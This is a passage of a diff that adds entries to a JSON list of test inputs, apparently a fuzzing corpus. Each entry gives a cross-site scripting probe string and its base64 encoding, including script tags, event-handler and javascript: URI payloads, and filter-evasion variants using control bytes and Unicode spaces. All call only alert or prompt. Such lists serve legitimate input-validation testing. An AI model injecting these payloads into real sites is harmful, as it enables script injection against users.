+    "string": "<img src=x onerror=alert(2) />",
+    "base64": "PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpIC8+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<svg><script>123<1>alert(3)</script>",
+    "base64": "PHN2Zz48c2NyaXB0PjEyMzwxPmFsZXJ0KDMpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"><script>alert(4)</script>",
+    "base64": "Ij48c2NyaXB0PmFsZXJ0KDQpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "'><script>alert(5)</script>",
+    "base64": "Jz48c2NyaXB0PmFsZXJ0KDUpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "><script>alert(6)</script>",
+    "base64": "PjxzY3JpcHQ+YWxlcnQoNik8L3NjcmlwdD4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "</script><script>alert(7)</script>",
+    "base64": "PC9zY3JpcHQ+PHNjcmlwdD5hbGVydCg3KTwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "< / script >< script >alert(8)< / script >",
+    "base64": "PCAvIHNjcmlwdCA+PCBzY3JpcHQgPmFsZXJ0KDgpPCAvIHNjcmlwdCA+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "onfocus=JaVaSCript:alert(9) autofocus",
+    "base64": "b25mb2N1cz1KYVZhU0NyaXB0OmFsZXJ0KDkpIGF1dG9mb2N1cw=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\" onfocus=JaVaSCript:alert(10) autofocus",
+    "base64": "IiBvbmZvY3VzPUphVmFTQ3JpcHQ6YWxlcnQoMTApIGF1dG9mb2N1cw=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "' onfocus=JaVaSCript:alert(11) autofocus",
+    "base64": "JyBvbmZvY3VzPUphVmFTQ3JpcHQ6YWxlcnQoMTEpIGF1dG9mb2N1cw=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "＜script＞alert(12)＜/script＞",
+    "base64": "77ycc2NyaXB077yeYWxlcnQoMTIp77ycL3NjcmlwdO+8ng=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<sc<script>ript>alert(13)</sc</script>ript>",
+    "base64": "PHNjPHNjcmlwdD5yaXB0PmFsZXJ0KDEzKTwvc2M8L3NjcmlwdD5yaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "--><script>alert(14)</script>",
+    "base64": "LS0+PHNjcmlwdD5hbGVydCgxNCk8L3NjcmlwdD4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\";alert(15);t=\"",
+    "base64": "IjthbGVydCgxNSk7dD0i"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "';alert(16);t='",
+    "base64": "JzthbGVydCgxNik7dD0n"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "JavaSCript:alert(17)",
+    "base64": "SmF2YVNDcmlwdDphbGVydCgxNyk="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": ";alert(18);",
+    "base64": "O2FsZXJ0KDE4KTs="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "src=JaVaSCript:prompt(19)",
+    "base64": "c3JjPUphVmFTQ3JpcHQ6cHJvbXB0KDE5KQ=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"><script>alert(20);</script x=\"",
+    "base64": "Ij48c2NyaXB0PmFsZXJ0KDIwKTs8L3NjcmlwdCB4PSI="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "'><script>alert(21);</script x='",
+    "base64": "Jz48c2NyaXB0PmFsZXJ0KDIxKTs8L3NjcmlwdCB4PSc="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "><script>alert(22);</script x=",
+    "base64": "PjxzY3JpcHQ+YWxlcnQoMjIpOzwvc2NyaXB0IHg9"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\" autofocus onkeyup=\"javascript:alert(23)",
+    "base64": "IiBhdXRvZm9jdXMgb25rZXl1cD0iamF2YXNjcmlwdDphbGVydCgyMyk="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "' autofocus onkeyup='javascript:alert(24)",
+    "base64": "JyBhdXRvZm9jdXMgb25rZXl1cD0namF2YXNjcmlwdDphbGVydCgyNCk="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x20type=\"text/javascript\">javascript:alert(25);</script>",
+    "base64": "PHNjcmlwdFx4MjB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmphdmFzY3JpcHQ6YWxlcnQoMjUpOzwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x3Etype=\"text/javascript\">javascript:alert(26);</script>",
+    "base64": "PHNjcmlwdFx4M0V0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmphdmFzY3JpcHQ6YWxlcnQoMjYpOzwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x0Dtype=\"text/javascript\">javascript:alert(27);</script>",
+    "base64": "PHNjcmlwdFx4MER0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmphdmFzY3JpcHQ6YWxlcnQoMjcpOzwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x09type=\"text/javascript\">javascript:alert(28);</script>",
+    "base64": "PHNjcmlwdFx4MDl0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmphdmFzY3JpcHQ6YWxlcnQoMjgpOzwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x0Ctype=\"text/javascript\">javascript:alert(29);</script>",
+    "base64": "PHNjcmlwdFx4MEN0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmphdmFzY3JpcHQ6YWxlcnQoMjkpOzwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x2Ftype=\"text/javascript\">javascript:alert(30);</script>",
+    "base64": "PHNjcmlwdFx4MkZ0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmphdmFzY3JpcHQ6YWxlcnQoMzApOzwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script\\x0Atype=\"text/javascript\">javascript:alert(31);</script>",
+    "base64": "PHNjcmlwdFx4MEF0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmphdmFzY3JpcHQ6YWxlcnQoMzEpOzwvc2NyaXB0Pg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "'`\"><\\x3Cscript>javascript:alert(32)</script>",
+    "base64": "J2AiPjxceDNDc2NyaXB0PmphdmFzY3JpcHQ6YWxlcnQoMzIpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "'`\"><\\x00script>javascript:alert(33)</script>",
+    "base64": "J2AiPjxceDAwc2NyaXB0PmphdmFzY3JpcHQ6YWxlcnQoMzMpPC9zY3JpcHQ+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x\\x3Aexpression(javascript:alert(34)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieFx4M0FleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoMzQpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:expression\\x5C(javascript:alert(35)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpleHByZXNzaW9uXHg1QyhqYXZhc2NyaXB0OmFsZXJ0KDM1KSI+REVG"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:expression\\x00(javascript:alert(36)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpleHByZXNzaW9uXHgwMChqYXZhc2NyaXB0OmFsZXJ0KDM2KSI+REVG"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:exp\\x00ression(javascript:alert(37)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpleHBceDAwcmVzc2lvbihqYXZhc2NyaXB0OmFsZXJ0KDM3KSI+REVG"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:exp\\x5Cression(javascript:alert(38)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpleHBceDVDcmVzc2lvbihqYXZhc2NyaXB0OmFsZXJ0KDM4KSI+REVG"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x0Aexpression(javascript:alert(39)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceDBBZXhwcmVzc2lvbihqYXZhc2NyaXB0OmFsZXJ0KDM5KSI+REVG"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x09expression(javascript:alert(40)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceDA5ZXhwcmVzc2lvbihqYXZhc2NyaXB0OmFsZXJ0KDQwKSI+REVG"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(41)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUzXHg4MFx4ODBleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNDEpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(42)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODRleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNDIpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(43)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEMyXHhBMGV4cHJlc3Npb24oamF2YXNjcmlwdDphbGVydCg0MykiPkRFRg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(44)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODBleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNDQpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(45)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4OEFleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNDUpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x0Dexpression(javascript:alert(46)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceDBEZXhwcmVzc2lvbihqYXZhc2NyaXB0OmFsZXJ0KDQ2KSI+REVG"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x0Cexpression(javascript:alert(47)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceDBDZXhwcmVzc2lvbihqYXZhc2NyaXB0OmFsZXJ0KDQ3KSI+REVG"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(48)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODdleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNDgpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(49)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEVGXHhCQlx4QkZleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNDkpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x20expression(javascript:alert(50)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceDIwZXhwcmVzc2lvbihqYXZhc2NyaXB0OmFsZXJ0KDUwKSI+REVG"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(51)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODhleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNTEpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x00expression(javascript:alert(52)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceDAwZXhwcmVzc2lvbihqYXZhc2NyaXB0OmFsZXJ0KDUyKSI+REVG"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(53)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4OEJleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNTMpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(54)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODZleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNTQpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(55)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODVleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNTUpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(56)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODJleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNTYpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\x0Bexpression(javascript:alert(57)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceDBCZXhwcmVzc2lvbihqYXZhc2NyaXB0OmFsZXJ0KDU3KSI+REVG"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(58)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODFleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNTgpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(59)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODNleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNTkpIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(60)\">DEF",
+    "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODlleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNjApIj5ERUY="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Bjavascript:javascript:alert(61)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwQmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg2MSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Fjavascript:javascript:alert(62)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwRmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg2MikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xC2\\xA0javascript:javascript:alert(63)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhDMlx4QTBqYXZhc2NyaXB0OmphdmFzY3JpcHQ6YWxlcnQoNjMpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x05javascript:javascript:alert(64)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwNWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg2NCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(65)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMVx4QTBceDhFamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDY1KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x18javascript:javascript:alert(66)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxOGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg2NikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x11javascript:javascript:alert(67)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxMWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg2NykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(68)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg4amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDY4KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(69)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg5amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDY5KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(70)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDgwamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDcwKSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x17javascript:javascript:alert(71)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxN2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3MSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x03javascript:javascript:alert(72)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwM2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3MikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Ejavascript:javascript:alert(73)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwRWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3MykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Ajavascript:javascript:alert(74)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxQWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3NCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x00javascript:javascript:alert(75)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwMGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3NSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x10javascript:javascript:alert(76)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxMGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3NikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(77)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDgyamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDc3KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x20javascript:javascript:alert(78)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgyMGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3OCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x13javascript:javascript:alert(79)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxM2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3OSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x09javascript:javascript:alert(80)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgwOWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4MCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(81)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDhBamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDgxKSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x14javascript:javascript:alert(82)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxNGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4MikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x19javascript:javascript:alert(83)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxOWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4MykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(84)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceEFGamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDg0KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Fjavascript:javascript:alert(85)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxRmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4NSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(86)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDgxamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDg2KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Djavascript:javascript:alert(87)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHgxRGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4NykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(88)\" id=\"fuzzelement1\">test</a>",
+    "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg3amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDg4KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x07javascript:javascript:alert(89)\" id=\"fuzzelement1\">test</a>",
